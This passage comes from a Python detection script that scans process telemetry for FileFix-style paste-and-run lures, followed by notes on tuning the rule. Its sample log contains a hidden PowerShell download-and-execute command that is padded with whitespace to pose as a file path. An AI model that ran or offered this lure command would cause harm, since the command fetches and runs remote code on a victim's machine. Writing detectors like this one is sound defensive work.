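    return [name for pattern, name in INDICATORS if pattern.search(cmdline)]


def scan(lines) -> list:
    """Return (ProcessId, reasons) for every flagged JSON event line."""
    hits = []
    for line in lines:
        line = line.strip()
        if not line:
            continue
        event = json.loads(line)
        reasons = classify(event)
        if reasons:
            hits.append((event["ProcessId"], reasons))
    return hits


# Constructed sample telemetry: a FileFix paste, a benign terminal launch from
# the Start menu, and a hidden-window task whose parent is svchost.exe, which
# a rule keyed on explorer.exe deliberately does not cover.
SAMPLE_LOG = [
    json.dumps({
        "ProcessId": 4412,
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "ParentImage": r"C:\Windows\explorer.exe",
        "CommandLine": r'powershell.exe -w hidden -c "iwr https://example.invalid/x | iex"'
                       + " " * 40 + r"# C:\company\internal-secure\filedrop\report.pdf",
    }),
    json.dumps({
        "ProcessId": 4420,
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "ParentImage": r"C:\Windows\explorer.exe",
        "CommandLine": "powershell.exe",
    }),
    json.dumps({
        "ProcessId": 4431,
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "ParentImage": r"C:\Windows\System32\svchost.exe",
        "CommandLine": r"powershell.exe -w hidden -File C:\ProgramData\maint.ps1",
    }),
]

if __name__ == "__main__":
    for pid, reasons in scan(SAMPLE_LOG):
        print(f"PID {pid}: {', '.join(reasons)}")
```

Only the first sample event is reported, with all three of its indicators. Keying the rule on explorer.exe as the parent is what keeps it specific to the paste-and-run lure; the third event (a hidden-window PowerShell from a service) is a real finding for a different rule, and is left out here on purpose so the two do not get conflated during tuning.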